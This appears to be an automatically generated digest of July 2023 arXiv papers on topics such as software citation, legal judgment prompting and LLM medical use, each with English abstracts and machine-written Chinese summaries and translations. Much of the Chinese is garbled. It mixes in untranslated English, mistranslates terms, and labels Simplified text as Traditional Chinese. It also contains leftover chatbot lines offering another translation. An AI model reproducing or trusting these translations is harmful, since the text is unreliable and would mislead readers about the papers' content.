methods: 本研究使用长期数据集，对2021年和2022年所有R包的引用格式进行比较和分析，以了解R语言包的引用格式，这些包是开源软件家族中重要的成员，以及引用格式是如何发展起来的。
results: 研究发现，不同的文档类型下的引用格式存在差异，而且在不同时间点，Metadata元素在引用格式中的变化也存在差异。此外，研究还发现了软件纸引用的专业性。通过这项研究，我们希望能够为软件引用政策和基础设施提供更好的理解。

Abstract
Under the data-driven research paradigm, research software has come to play crucial roles in nearly every stage of scientific inquiry. Scholars are advocating for the formal citation of software in academic publications, treating it on par with traditional research outputs. However, software is hardly consistently cited: one software entity can be cited as different objects, and the citations can change over time. These issues, however, are largely overlooked in existing empirical research on software citation. To fill the above gaps, the present study compares and analyzes a longitudinal dataset of citation formats of all R packages collected in 2021 and 2022, in order to understand the citation formats of R-language packages, important members in the open-source software family, and how the citations evolve over time. In particular, we investigate the different document types underlying the citations and what metadata elements in the citation formats changed over time. Furthermore, we offer an in-depth analysis of the disciplinarity of journal articles cited as software (software papers). By undertaking this research, we aim to contribute to a better understanding of the complexities associated with software citation, shedding light on future software citation policies and infrastructure.

摘要
(Note: The text has been translated into Simplified Chinese, which is the standard form of Chinese used in mainland China and Singapore. The translation may not be perfect, and some nuances of the original text may be lost in translation.)

Legal Syllogism Prompting: Teaching Large Language Models for Legal Judgment Prediction

paper_url: http://arxiv.org/abs/2307.08321
repo_url: None
paper_authors: Cong Jiang, Xiaolei Yang
for: 本研究旨在开发一种简单的提示方法，以教育大型自然语言处理模型（LLM）在法律推理中进行判断预测。
methods: 本研究使用的是“法律推理提示”（LoT）方法，它只教育模型在法律推理中，主 premise 是法律， minor premise 是事实，结论是判断。
results: 在 CAIL2018 中国刑事案例集上，我们使用 GPT-3 模型进行零例判断预测实验，结果显示 LLM 使用 LoT 方法可以在多种推理任务上表现更好 than 基eline 和链式思维提示方法。 LoT 方法使得模型能够吸取到关键信息 relevante 于判断，正确理解法律规定的意义，与其他方法相比更加精准。

Abstract
Legal syllogism is a form of deductive reasoning commonly used by legal professionals to analyze cases. In this paper, we propose legal syllogism prompting (LoT), a simple prompting method to teach large language models (LLMs) for legal judgment prediction. LoT teaches only that in the legal syllogism the major premise is law, the minor premise is the fact, and the conclusion is judgment. Then the models can produce a syllogism reasoning of the case and give the judgment without any learning, fine-tuning, or examples. On CAIL2018, a Chinese criminal case dataset, we performed zero-shot judgment prediction experiments with GPT-3 models. Our results show that LLMs with LoT achieve better performance than the baseline and chain of thought prompting, the state-of-art prompting method on diverse reasoning tasks. LoT enables the model to concentrate on the key information relevant to the judgment and to correctly understand the legal meaning of acts, as compared to other methods. Our method enables LLMs to predict judgment along with law articles and justification, which significantly enhances the explainability of models.

摘要
法律逻辑是法律专业人员常用的推理方式，用于分析案例。在这篇论文中，我们提出了法律逻辑提示（LoT），一种简单的提示方法，用于教育大型自然语言模型（LLM）进行法律判断预测。LoT只教导了在法律逻辑中，主 Premise 是法律，次 Premise 是事实，结论是判断。然后模型可以生成案例的逻辑推理，并给出判断。在 CAIL2018 中国刑事案例集上，我们进行了零shot 判断预测实验，使用 GPT-3 模型。我们的结果显示， LLMS WITH LoT 在多种推理任务上表现更好 than 基eline 和链条思维提示方法。LoT 使得模型能够专注于关键信息 relevante 到判断，正确理解法律 act 的法律含义，与其他方法相比。我们的方法允许 LLMS 预测判断，同时提供法律条文和 justify，这显著提高了模型的解释性。

IterLara: A Turing Complete Algebra for Big Data, AI, Scientific Computing, and Database

paper_url: http://arxiv.org/abs/2307.08315
repo_url: None
paper_authors: Hongxiao Li, Wanling Gao, Lei Wang, Jianfeng Zhan
for: This paper aims to provide an algebraic model that unifies operations in general-purpose computing, such as big data, AI, scientific computing, and database.methods: The paper proposes \textsc{IterLara}, an extension of \textsc{Lara} with iterative operators, to achieve this goal.results: The paper studies the expressive ability of \textsc{Lara} and \textsc{IterLara} and proves that \textsc{IterLara} with aggregation functions can represent matrix inversion and determinant. Additionally, the paper shows that \textsc{IterLara} with no limitation of function utility is Turing complete, and proposes the Operation Count (OP) as a metric of computation amount for \textsc{IterLara}.

Abstract
\textsc{Lara} is a key-value algebra that aims at unifying linear and relational algebra with three types of operation abstraction. The study of \textsc{Lara}'s expressive ability reports that it can represent relational algebra and most linear algebra operations. However, several essential computations, such as matrix inversion and determinant, cannot be expressed in \textsc{Lara}. \textsc{Lara} cannot represent global and iterative computation, either. This article proposes \textsc{IterLara}, extending \textsc{Lara} with iterative operators, to provide an algebraic model that unifies operations in general-purpose computing, like big data, AI, scientific computing, and database. We study the expressive ability of \textsc{Lara} and \textsc{IterLara} and prove that \textsc{IterLara} with aggregation functions can represent matrix inversion, determinant. Besides, we demonstrate that \textsc{IterLara} with no limitation of function utility is Turing complete. We also propose the Operation Count (OP) as a metric of computation amount for \textsc{IterLara} and ensure that the OP metric is in accordance with the existing computation metrics.

摘要
\begin{blockquote}\textsc{Lara} 是一种键值代数，旨在将线性代数和关系代数合一，并提供三种操作抽象类型。研究 \textsc{Lara} 的表达能力发现，它可以表示关系代数和大多数线性代数操作。然而，一些基本计算，如矩阵逆元和 determinant，无法在 \textsc{Lara} 中表达。此外， \textsc{Lara} 也无法表示全局和迭代计算。这篇文章提出 \textsc{IterLara}， extending \textsc{Lara} WITH 迭代操作，以提供一种通用计算中的代数模型，包括大数据、人工智能、科学计算和数据库。我们研究 \textsc{Lara} 和 \textsc{IterLara} 的表达能力，并证明 \textsc{IterLara} WITH 聚合函数可以表示矩阵逆元和 determinant。此外，我们还证明 \textsc{IterLara} WITH 无限函数Utility 是 Turing 完全的。我们还提出了 Operation Count（OP）作为 \textsc{IterLara} 的计算量度，并证明 OP 度量与现有计算度量相符。\end{blockquoteNote that the translation is in Simplified Chinese, which is the standard form of Chinese used in mainland China and Singapore. If you prefer Traditional Chinese, please let me know and I can provide the translation in that form instead.

CoAD: Automatic Diagnosis through Symptom and Disease Collaborative Generation

paper_url: http://arxiv.org/abs/2307.08290
repo_url: https://github.com/kwanwaichung/coad
paper_authors: Huimin Wang, Wai-Chung Kwan, Kam-Fai Wong, Yefeng Zheng
for: 该研究旨在提高自动诊断（AD）的精度，以帮助医生更加精确地诊断疾病。
methods: 该方法使用Transformer架构，将症状序列作为输入，透过自动重构来预测疾病。
results: 该研究获得了2.3%的提升，与前一代最佳结果相比。

Abstract
Automatic diagnosis (AD), a critical application of AI in healthcare, employs machine learning techniques to assist doctors in gathering patient symptom information for precise disease diagnosis. The Transformer-based method utilizes an input symptom sequence, predicts itself through auto-regression, and employs the hidden state of the final symptom to determine the disease. Despite its simplicity and superior performance demonstrated, a decline in disease diagnosis accuracy is observed caused by 1) a mismatch between symptoms observed during training and generation, and 2) the effect of different symptom orders on disease prediction. To address the above obstacles, we introduce the CoAD, a novel disease and symptom collaborative generation framework, which incorporates several key innovations to improve AD: 1) aligning sentence-level disease labels with multiple possible symptom inquiry steps to bridge the gap between training and generation; 2) expanding symptom labels for each sub-sequence of symptoms to enhance annotation and eliminate the effect of symptom order; 3) developing a repeated symptom input schema to effectively and efficiently learn the expanded disease and symptom labels. We evaluate the CoAD framework using four datasets, including three public and one private, and demonstrate that it achieves an average 2.3% improvement over previous state-of-the-art results in automatic disease diagnosis. For reproducibility, we release the code and data at https://github.com/KwanWaiChung/coad.

摘要
自动诊断（AD），医疗领域中critical应用的人工智能技术，利用机器学习技术帮助医生收集病人症状信息，以确定精准的疾病诊断。transformer基本方法使用输入症状序列，通过自动回归，并使用最终症状隐藏状态来确定疾病。despite its simplicity and superior performance demonstrated, a decline in disease diagnosis accuracy is observed caused by 1) a mismatch between symptoms observed during training and generation, and 2) the effect of different symptom orders on disease prediction. To address the above obstacles, we introduce the CoAD, a novel disease and symptom collaborative generation framework, which incorporates several key innovations to improve AD: 1) aligning sentence-level disease labels with multiple possible symptom inquiry steps to bridge the gap between training and generation; 2) expanding symptom labels for each sub-sequence of symptoms to enhance annotation and eliminate the effect of symptom order; 3) developing a repeated symptom input schema to effectively and efficiently learn the expanded disease and symptom labels. We evaluate the CoAD framework using four datasets, including three public and one private, and demonstrate that it achieves an average 2.3% improvement over previous state-of-the-art results in automatic disease diagnosis. For reproducibility, we release the code and data at https://github.com/KwanWaiChung/coad.Here's the translation in Traditional Chinese:自动诊断（AD），医疗领域中critical应用的人工智能技术，利用机器学习技术帮助医生收集病人症状信息，以确定精确的疾病诊断。transformer基本方法使用输入症状序列，通过自动回归，并使用最终症状隐藏状态来确定疾病。despite its simplicity and superior performance demonstrated, a decline in disease diagnosis accuracy is observed caused by 1) a mismatch between symptoms observed during training and generation, and 2) the effect of different symptom orders on disease prediction. To address the above obstacles, we introduce the CoAD, a novel disease and symptom collaborative generation framework, which incorporates several key innovations to improve AD: 1) aligning sentence-level disease labels with multiple possible symptom inquiry steps to bridge the gap between training and generation; 2) expanding symptom labels for each sub-sequence of symptoms to enhance annotation and eliminate the effect of symptom order; 3) developing a repeated symptom input schema to effectively and efficiently learn the expanded disease and symptom labels. We evaluate the CoAD framework using four datasets, including three public and one private, and demonstrate that it achieves an average 2.3% improvement over previous state-of-the-art results in automatic disease diagnosis. For reproducibility, we release the code and data at https://github.com/KwanWaiChung/coad.

Automated Action Model Acquisition from Narrative Texts

paper_url: http://arxiv.org/abs/2307.10247
repo_url: None
paper_authors: Ruiqi Li, Leyang Cui, Songtuan Lin, Patrik Haslum
for: 本研究旨在提高人工智能代理人的决策能力，通过自动从叙述文本中提取结构化事件和生成 планинг语言风格的动作模型。
methods: 本研究使用了自动从叙述文本中提取结构化事件的方法，并基于预测常识事件关系、文本矛盾和相似性，生成了 планинг语言风格的动作模型。
results: 实验结果显示，NaRuto可以在经典叙述规划领域中生成高质量的动作模型，与现有的完全自动方法相当，甚至与半自动方法相当。

Abstract
Action models, which take the form of precondition/effect axioms, facilitate causal and motivational connections between actions for AI agents. Action model acquisition has been identified as a bottleneck in the application of planning technology, especially within narrative planning. Acquiring action models from narrative texts in an automated way is essential, but challenging because of the inherent complexities of such texts. We present NaRuto, a system that extracts structured events from narrative text and subsequently generates planning-language-style action models based on predictions of commonsense event relations, as well as textual contradictions and similarities, in an unsupervised manner. Experimental results in classical narrative planning domains show that NaRuto can generate action models of significantly better quality than existing fully automated methods, and even on par with those of semi-automated methods.

摘要
<使用减少的语言表达，模型可以帮助人工智能代理人进行计划和决策。但是获取这些模型的步骤是困难的，特别是在叙述计划领域。我们提出了一种系统，它可以自动从叙述文本中提取结构化事件，并根据预测的常识事件关系、文本矛盾和相似性，生成计划语言风格的行动模型，而不需要人工干预。我们的实验结果表明，NaRuto可以在经典叙述计划领域生成的行动模型质量比既有的完全自动方法更高，甚至与半自动方法相当。Here's the translation in Traditional Chinese: <使用简化的语言表达，模型可以帮助人工智能代理人进行计划和决策。但是获取这些模型的步骤是困难的，特别是在叙述计划领域。我们提出了一个系统，它可以自动从叙述文本中提取结构化事件，并根据预测的常识事件关系、文本矛盾和相似性，生成计划语言风格的行动模型，而不需要人工干预。我们的实验结果表明，NaRuto可以在经典叙述计划领域生成的行动模型质量比既有的完全自动方法更高，甚至与半自动方法相当。

ChatGPT is Good but Bing Chat is Better for Vietnamese Students

paper_url: http://arxiv.org/abs/2307.08272
repo_url: None
paper_authors: Xuan-Quy Dao, Ngoc-Bich Le
for: 这个研究旨在探讨两个现代大语言模型（LLMs），即ChatGPT和Microsoft Bing Chat（BingChat），在越南学生的需求下是否有效。
methods: 我们进行了这两个LLMs在不同学科中的比较分析，包括数学、文学、英语、物理、化学、生物、历史、地理和公民教育等。
results: 我们的研究结果表明，BingChat在各种学科中表现出色，只有文学领域是ChatGPT表现得更好。此外，BingChat使用了更高级的GPT-4技术，而ChatGPT是基于GPT-3.5技术。这使得BingChat可以提高其理解、判断和创造性文本生成能力。此外，BingChat在越南可用并具有内置的链接和参考，这也为其superiority做出了贡献。

Abstract
This study examines the efficacy of two SOTA large language models (LLMs), namely ChatGPT and Microsoft Bing Chat (BingChat), in catering to the needs of Vietnamese students. Although ChatGPT exhibits proficiency in multiple disciplines, Bing Chat emerges as the more advantageous option. We conduct a comparative analysis of their academic achievements in various disciplines, encompassing mathematics, literature, English language, physics, chemistry, biology, history, geography, and civic education. The results of our study suggest that BingChat demonstrates superior performance compared to ChatGPT across a wide range of subjects, with the exception of literature, where ChatGPT exhibits better performance. Additionally, BingChat utilizes the more advanced GPT-4 technology in contrast to ChatGPT, which is built upon GPT-3.5. This allows BingChat to improve to comprehension, reasoning and generation of creative and informative text. Moreover, the fact that BingChat is accessible in Vietnam and its integration of hyperlinks and citations within responses serve to reinforce its superiority. In our analysis, it is evident that while ChatGPT exhibits praiseworthy qualities, BingChat presents a more apdated solutions for Vietnamese students.

摘要
Here's the translation in Simplified Chinese:这个研究检查了两个现代大型自然语言处理器（LLM），即ChatGPT和Microsoft Bing Chat（BingChat），在越南学生的需求下是否有效。虽然ChatGPT在多个领域展现出色，但BingChat emerges as the more advantageous option。我们进行了多个学科的比较分析，包括数学、文学、英语、物理、化学、生物、历史、地理和公民教育。我们的研究结果表明，BingChat在多个学科中表现出色，只有文学领域，ChatGPT的表现更好。此外，BingChat使用更先进的GPT-4技术，可以提高对话、理解和创造性文本的能力。此外，BingChat在越南可用，并且在回答中包含链接和参考文献，这些因素都服务于加强其优势。在我们的分析中，可以看到，虽然ChatGPT具有称赞的特点，但BingChat提供了更先进的解决方案 для越南学生。

Extending the Frontier of ChatGPT: Code Generation and Debugging

paper_url: http://arxiv.org/abs/2307.08260
repo_url: None
paper_authors: Fardin Ahsan Sakib, Saadat Hasan Khan, A. H. M. Rezaul Karim
for: 这篇论文旨在研究 ChatGPT 是否可以解决编程问题，并评估其解决问题的正确性和效率。
methods: 该论文使用 ChatGPT 解决 Leetcode 上的编程问题，并对其解决的问题进行了评估。
results: 论文发现，ChatGPT 的总成功率为 71.875%，表明它可以成功解决大多数编程问题。它在结构化问题上表现出了优异，但在接受反馈改进解决方案时表现不佳。

Abstract
Large-scale language models (LLMs) have emerged as a groundbreaking innovation in the realm of question-answering and conversational agents. These models, leveraging different deep learning architectures such as Transformers, are trained on vast corpora to predict sentences based on given queries. Among these LLMs, ChatGPT, developed by OpenAI, has ushered in a new era by utilizing artificial intelligence (AI) to tackle diverse problem domains, ranging from composing essays and biographies to solving intricate mathematical integrals. The versatile applications enabled by ChatGPT offer immense value to users. However, assessing the performance of ChatGPT's output poses a challenge, particularly in scenarios where queries lack clear objective criteria for correctness. For instance, evaluating the quality of generated essays becomes arduous and relies heavily on manual labor, in stark contrast to evaluating solutions to well-defined, closed-ended questions such as mathematical problems. This research paper delves into the efficacy of ChatGPT in solving programming problems, examining both the correctness and the efficiency of its solution in terms of time and memory complexity. The research reveals a commendable overall success rate of 71.875\%, denoting the proportion of problems for which ChatGPT was able to provide correct solutions that successfully satisfied all the test cases present in Leetcode. It exhibits strengths in structured problems and shows a linear correlation between its success rate and problem acceptance rates. However, it struggles to improve solutions based on feedback, pointing to potential shortcomings in debugging tasks. These findings provide a compact yet insightful glimpse into ChatGPT's capabilities and areas for improvement.

摘要
大规模语言模型（LLM）已经成为问答和对话机器人领域的创新之一。这些模型，利用不同的深度学习架构，如转换器，在庞大的文献中进行训练，以预测基于给定查询的句子。中的ChatGPT，由OpenAI开发，对多种问题领域进行了应用，从编写文章和传记到解决复杂的数学 интеграル。这些应用具有巨大的价值，但评估ChatGPT的输出性能具有挑战，尤其是在查询缺乏明确的对象标准的情况下。例如，评估生成的文章的质量变得困难，需要大量的人工劳动，与解决具有明确对象标准的关闭式问题，如数学问题，存在很大的区别。本研究评估了ChatGPT在编程问题上的效果，包括正确性和时间复杂度、内存复杂度。研究发现，ChatGPT在Leetcode上的总成功率为71.875%，表示它可以成功解决的问题数。它在结构化问题上表现出了优异，与问题接受率之间存在直线相关性。但是，它在反馈基础上改进解决方案存在困难，表明可能存在调试任务的缺陷。这些发现为ChatGPT的能力和改进提供了一个紧凑 yet 深入的视角。

PAT: Parallel Attention Transformer for Visual Question Answering in Vietnamese

paper_url: http://arxiv.org/abs/2307.08247
repo_url: None
paper_authors: Nghia Hieu Nguyen, Kiet Van Nguyen
for: 本文提出了一种新的多模态学习方法，称为并行注意机制。
methods: 本文提出了一种新的语言特征提取模块，即干扰语言特征提取器（Hierarchical Linguistic Features Extractor，HLFE），以及一种基于Transformer架构的并行注意机制（Parallel Attention Transformer，PAT）。
results: 根据本文的实验结果，PAT在ViVQA数据集上达到了所有基准值和其他SOTA方法（包括SAAA和MCAN）的最高准确率。

Abstract
We present in this paper a novel scheme for multimodal learning named the Parallel Attention mechanism. In addition, to take into account the advantages of grammar and context in Vietnamese, we propose the Hierarchical Linguistic Features Extractor instead of using an LSTM network to extract linguistic features. Based on these two novel modules, we introduce the Parallel Attention Transformer (PAT), achieving the best accuracy compared to all baselines on the benchmark ViVQA dataset and other SOTA methods including SAAA and MCAN.

摘要
我们在这篇论文中提出了一种新的多Modal学习方案，称为并行注意机制。此外，为了利用越南语的语法和语言上下文的优势，我们提议使用层次语言特征提取器而不是LSTM网络来提取语言特征。基于这两种新模块，我们介绍了并行注意变换器（PAT），在 benchmark ViVQA 数据集和其他 SOTA 方法，包括 SAAA 和 MCAN，中达到最高准确率。

ivrit.ai: A Comprehensive Dataset of Hebrew Speech for AI Research and Development

paper_url: http://arxiv.org/abs/2307.08720
repo_url: https://github.com/yairl/ivrit.ai
paper_authors: Yanir Marmor, Kinneret Misgav, Yair Lifshitz
for: 提高希伯来语自动语音识别技术的研究和开发
methods: 使用大量希伯来语 speech数据，包括未经过音响活动检测和部分转录数据，以满足不同研究需求
results: 提供了大量、多样化的希伯来语 speech数据资源，可以帮助研究人员、开发者和商业机构提高希伯来语自动语音识别技术的水平Translation:
for: 提高希伯来语自动语音识别技术的研究和开发
methods: 使用大量希伯来语 speech数据，包括未经过音响活动检测和部分转录数据，以满足不同研究需求
results: 提供了大量、多样化的希伯来语 speech数据资源，可以帮助研究人员、开发者和商业机构提高希伯来语自动语音识别技术的水平

Abstract
We introduce "ivrit.ai", a comprehensive Hebrew speech dataset, addressing the distinct lack of extensive, high-quality resources for advancing Automated Speech Recognition (ASR) technology in Hebrew. With over 3,300 speech hours and a over a thousand diverse speakers, ivrit.ai offers a substantial compilation of Hebrew speech across various contexts. It is delivered in three forms to cater to varying research needs: raw unprocessed audio; data post-Voice Activity Detection, and partially transcribed data. The dataset stands out for its legal accessibility, permitting use at no cost, thereby serving as a crucial resource for researchers, developers, and commercial entities. ivrit.ai opens up numerous applications, offering vast potential to enhance AI capabilities in Hebrew. Future efforts aim to expand ivrit.ai further, thereby advancing Hebrew's standing in AI research and technology.

摘要
我们介绍“ivrit.ai”，一个全面的 hébrew 语音数据集，纠正了 hébrew 语音识别技术的缺乏大量、高质量资源。 ivrit.ai 包含了超过 3,300 小时的语音数据和数百个多样化的说话人，在不同的场景下提供了广泛的 hébrew 语音资料。该数据集提供三种形式，以适应不同的研究需求： raw 未处理的音频数据、 after Voice Activity Detection 的数据和部分转录的数据。ivrit.ai 的法律可 accessing，免费使用，因此成为研究人员、开发者和商业机构的重要资源。 ivrit.ai 开启了许多应用程序，提供了巨大的潜在space ，以提高 hébrew 语言在人工智能技术中的地位。未来努力将 ivrit.ai 进一步扩展，以推动 hébrew 语言在人工智能研究和技术中的发展。

BASS: Block-wise Adaptation for Speech Summarization

paper_url: http://arxiv.org/abs/2307.08217
repo_url: None
paper_authors: Roshan Sharma, Kenneth Zheng, Siddhant Arora, Shinji Watanabe, Rita Singh, Bhiksha Raj
for: 提高端到端语音摘要模型的性能，解决训练时间过长导致模型质量下降的问题。
methods: 采用块式训练方法，通过分割输入序列进行逐步训练，使模型能够在很长的输入序列上进行学习。
results: 在How2 dataset上实现了块式训练方法，比 truncated input baseline 高出3点级ROUGE-L。

Abstract
End-to-end speech summarization has been shown to improve performance over cascade baselines. However, such models are difficult to train on very large inputs (dozens of minutes or hours) owing to compute restrictions and are hence trained with truncated model inputs. Truncation leads to poorer models, and a solution to this problem rests in block-wise modeling, i.e., processing a portion of the input frames at a time. In this paper, we develop a method that allows one to train summarization models on very long sequences in an incremental manner. Speech summarization is realized as a streaming process, where hypothesis summaries are updated every block based on new acoustic information. We devise and test strategies to pass semantic context across the blocks. Experiments on the How2 dataset demonstrate that the proposed block-wise training method improves by 3 points absolute on ROUGE-L over a truncated input baseline.

摘要
<> translate "End-to-end speech summarization has been shown to improve performance over cascade baselines. However, such models are difficult to train on very large inputs (dozens of minutes or hours) owing to compute restrictions and are hence trained with truncated model inputs. Truncation leads to poorer models, and a solution to this problem rests in block-wise modeling, i.e., processing a portion of the input frames at a time. In this paper, we develop a method that allows one to train summarization models on very long sequences in an incremental manner. Speech summarization is realized as a streaming process, where hypothesis summaries are updated every block based on new acoustic information. We devise and test strategies to pass semantic context across the blocks. Experiments on the How2 dataset demonstrate that the proposed block-wise training method improves by 3 points absolute on ROUGE-L over a truncated input baseline." into Simplified Chinese.中文简体版：END-TO-END语音摘要模型已经显示在提高性能的情况下超过顺序基elines。然而，这些模型在非常长的输入（分钟或小时级别）上受到计算限制，因此通常使用 truncated 模型输入进行训练。这会导致模型较差，解决这个问题需要块式模型化，即在每个块（一段时间）中处理输入框架。在这篇论文中，我们开发了一种允许在非常长序列上逐步训练摘要模型的方法。在流动处理中，每个块基于新的音频信息更新假设摘要。我们提出并测试了在块之间传递 semantics 上下文的策略。在 How2 数据集上，我们的块式训练方法与 truncated 输入基线相比，提高了 ROUGE-L 指标的3个绝对点。

Analyzing Dataset Annotation Quality Management in the Wild

paper_url: http://arxiv.org/abs/2307.08153
repo_url: None
paper_authors: Jan-Christoph Klie, Richard Eckart de Castilho, Iryna Gurevych
for: 这些论文的目的是要研究数据质量对机器学习模型训练和评估的影响，以及现有数据集中是否存在错误注释、偏见或注释 artifacts。
methods: 这些论文使用了文献综述和建议的方法来描述数据集创建时的质量管理实践，以及如何应用这些建议。然后，它们编译了591篇科学论文引用的文本数据集，并对其进行了质量相关的注释。
results: 这些论文发现大多数注释的工作采用了良好或非常良好的质量管理方法，但有30%的工作只有较差的质量管理。分析还显示了一些常见的错误，特别是在使用间对注释协议和计算注释错误率时出现的错误。

Abstract
Data quality is crucial for training accurate, unbiased, and trustworthy machine learning models and their correct evaluation. Recent works, however, have shown that even popular datasets used to train and evaluate state-of-the-art models contain a non-negligible amount of erroneous annotations, bias or annotation artifacts. There exist best practices and guidelines regarding annotation projects. But to the best of our knowledge, no large-scale analysis has been performed as of yet on how quality management is actually conducted when creating natural language datasets and whether these recommendations are followed. Therefore, we first survey and summarize recommended quality management practices for dataset creation as described in the literature and provide suggestions on how to apply them. Then, we compile a corpus of 591 scientific publications introducing text datasets and annotate it for quality-related aspects, such as annotator management, agreement, adjudication or data validation. Using these annotations, we then analyze how quality management is conducted in practice. We find that a majority of the annotated publications apply good or very good quality management. However, we deem the effort of 30% of the works as only subpar. Our analysis also shows common errors, especially with using inter-annotator agreement and computing annotation error rates.

摘要
<> translation into Simplified Chinese文本质量对机器学习模型的训练和评估是关键。然而，当今最新的研究表明，即使使用最新的模型训练和评估的数据集中也包含一定数量的错误注释、偏见或注释遗留。现有的最佳实践和指南可以帮助确保数据集的质量。然而，我们知道的是，到目前为止没有任何大规模的分析，检查在创建自然语言数据集时是否实际遵循这些建议。因此，我们首先对文献中描述的质量管理做出survey和摘要，然后提供应用这些建议的建议。接着，我们编译了591篇科学论文引用的文本数据集，并对其进行质量相关的注释，包括注释员管理、一致性、仲裁或数据验证。使用这些注释，我们然后分析了在实践中是否实际遵循质量管理的方法。我们发现大多数注释的工作采用良好或非常良好的质量管理方法。然而，我们认为30%的工作仅为低水平。我们的分析还发现了一些常见的错误，特别是使用间接注释者一致性和计算注释错误率。

The Potential and Pitfalls of using a Large Language Model such as ChatGPT or GPT-4 as a Clinical Assistant

paper_url: http://arxiv.org/abs/2307.08152
repo_url: None
paper_authors: Jingqing Zhang, Kai Sun, Akshay Jagadeesh, Mahta Ghahfarokhi, Deepa Gupta, Ashok Gupta, Vibhor Gupta, Yike Guo
for: 这两篇研究用于评估ChatGPT和GPT-4在实际医疗数据库中的表现，以及它们在诊断助理方面的使用可行性。
methods: 这两篇研究使用了ChatGPT和GPT-4，分别在实际医疗数据库中进行了医疗诊断和诊断助理任务。
results: GPT-4在医疗诊断和诊断助理任务中的表现可以达到96%的F1分数，但是有些提示中含有误导性的资讯，遗传医疗发现和建议不必要的检测和治疗。这些问题，加上医疗资料保护问题，使这些模型目前不适合实际医疗应用。

Abstract
Recent studies have demonstrated promising performance of ChatGPT and GPT-4 on several medical domain tasks. However, none have assessed its performance using a large-scale real-world electronic health record database, nor have evaluated its utility in providing clinical diagnostic assistance for patients across a full range of disease presentation. We performed two analyses using ChatGPT and GPT-4, one to identify patients with specific medical diagnoses using a real-world large electronic health record database and the other, in providing diagnostic assistance to healthcare workers in the prospective evaluation of hypothetical patients. Our results show that GPT-4 across disease classification tasks with chain of thought and few-shot prompting can achieve performance as high as 96% F1 scores. For patient assessment, GPT-4 can accurately diagnose three out of four times. However, there were mentions of factually incorrect statements, overlooking crucial medical findings, recommendations for unnecessary investigations and overtreatment. These issues coupled with privacy concerns, make these models currently inadequate for real world clinical use. However, limited data and time needed for prompt engineering in comparison to configuration of conventional machine learning workflows highlight their potential for scalability across healthcare applications.

摘要
Here is the translation in Simplified Chinese: latest studies have shown that ChatGPT and GPT-4 have performed well on medical tasks, but no one has tested their performance on a large, real-world electronic health record database or evaluated their ability to provide clinical diagnostic assistance for patients with a wide range of symptoms. We conducted two studies using ChatGPT and GPT-4. One study used a real-world large electronic health record database to identify patients with specific medical diagnoses, and the other study provided diagnostic assistance to healthcare workers for hypothetical patients. Our results show that GPT-4 achieved high performance on disease classification tasks with chain of thought and few-shot prompting, with F1 scores as high as 96%. However, GPT-4 also made factually incorrect statements, overlooked crucial medical findings, and recommended unnecessary investigations and overtreatment. These issues, combined with privacy concerns, make these models currently unsuitable for real-world clinical use. However, the limited data and time required for prompt engineering compared to configuring conventional machine learning workflows highlight their potential for scalability across healthcare applications.

It’s All Relative: Interpretable Models for Scoring Bias in Documents

paper_url: http://arxiv.org/abs/2307.08139
repo_url: None
paper_authors: Aswin Suresh, Chi-Hsuan Wu, Matthias Grossglauser
for: 这篇论文的目的是提出一种可解释的模型，用于评分网络文档中的偏见。
methods: 这种模型基于布莱德利-泰勒axioms，并通过对同一篇Wikipedia文章的多个修订版本进行比较，以学习偏见的评分。
results: 模型可以准确地评分偏见，并且可以解释模型的参数，找到偏见的指标字。此外，模型还在不同的设置下进行了应用，包括研究Wikipedia文章的时间演化、比较新闻来源的偏见、以及评分法律修订的偏见。

Abstract
We propose an interpretable model to score the bias present in web documents, based only on their textual content. Our model incorporates assumptions reminiscent of the Bradley-Terry axioms and is trained on pairs of revisions of the same Wikipedia article, where one version is more biased than the other. While prior approaches based on absolute bias classification have struggled to obtain a high accuracy for the task, we are able to develop a useful model for scoring bias by learning to perform pairwise comparisons of bias accurately. We show that we can interpret the parameters of the trained model to discover the words most indicative of bias. We also apply our model in three different settings - studying the temporal evolution of bias in Wikipedia articles, comparing news sources based on bias, and scoring bias in law amendments. In each case, we demonstrate that the outputs of the model can be explained and validated, even for the two domains that are outside the training-data domain. We also use the model to compare the general level of bias between domains, where we see that legal texts are the least biased and news media are the most biased, with Wikipedia articles in between. Given its high performance, simplicity, interpretability, and wide applicability, we hope the model will be useful for a large community, including Wikipedia and news editors, political and social scientists, and the general public.

摘要
我们提出一种可解释的模型，用于评分网络文档中的偏见。我们的模型具有布莱德利-泰勒axioms的假设，并基于同一篇Wikipedia文章的修订版本进行训练。而且，我们的模型可以准确地比较修订版本之间的偏见水平。我们表明了我们可以解释模型中学习的参数，以便发现偏见的关键词。此外，我们还应用了我们的模型在三个不同的场景中：研究Wikipedia文章的时间演化、比较新闻来源的偏见水平以及评分法律修订的偏见水平。在每个场景中，我们都能够解释和验证模型的输出结果，包括在训练数据外的两个领域中。此外，我们还使用模型对不同领域的总体偏见水平进行比较，发现法律文档最少偏见，新闻媒体最多偏见，Wikipedia文章处于中间。考虑其高性能、简单、可解释和广泛应用，我们希望这种模型能够为大量社区提供帮助，包括Wikipedia编辑、新闻编辑、政治和社会科学家以及一般公众。

2023-07-17

cs.LG

cs.LG - 2023-07-17

A Study on the Performance of Generative Pre-trained Transformer (GPT) in Simulating Depressed Individuals on the Standardized Depressive Symptom Scale

paper_url: http://arxiv.org/abs/2307.08576
repo_url: None
paper_authors: Sijin Cai, Nanfeng Zhang, Jiaying Zhu, Yanjie Liu, Yongjin Zhou
for:* 这个论文的目的是评估GPT技术在诊断抑郁症中的潜力。methods:* 这个论文使用了三种抑郁症评估工具（HAMD-17、SDS、GDS-15），并在两个实验中使用GPT模拟抑郁症和正常个体的响应。results:* GPT在抑郁症评估中表现出了准确的性能，能够与正常个体和抑郁症个体的反应保持一致。* GPT在不同的抑郁程度下的表现存在一些差异，其表现更好的是在高敏感度的评估工具上。I hope that helps! Let me know if you have any other questions.

Abstract
Background: Depression is a common mental disorder with societal and economic burden. Current diagnosis relies on self-reports and assessment scales, which have reliability issues. Objective approaches are needed for diagnosing depression. Objective: Evaluate the potential of GPT technology in diagnosing depression. Assess its ability to simulate individuals with depression and investigate the influence of depression scales. Methods: Three depression-related assessment tools (HAMD-17, SDS, GDS-15) were used. Two experiments simulated GPT responses to normal individuals and individuals with depression. Compare GPT's responses with expected results, assess its understanding of depressive symptoms, and performance differences under different conditions. Results: GPT's performance in depression assessment was evaluated. It aligned with scoring criteria for both individuals with depression and normal individuals. Some performance differences were observed based on depression severity. GPT performed better on scales with higher sensitivity. Conclusion: GPT accurately simulates individuals with depression and normal individuals during depression-related assessments. Deviations occur when simulating different degrees of depression, limiting understanding of mild and moderate cases. GPT performs better on scales with 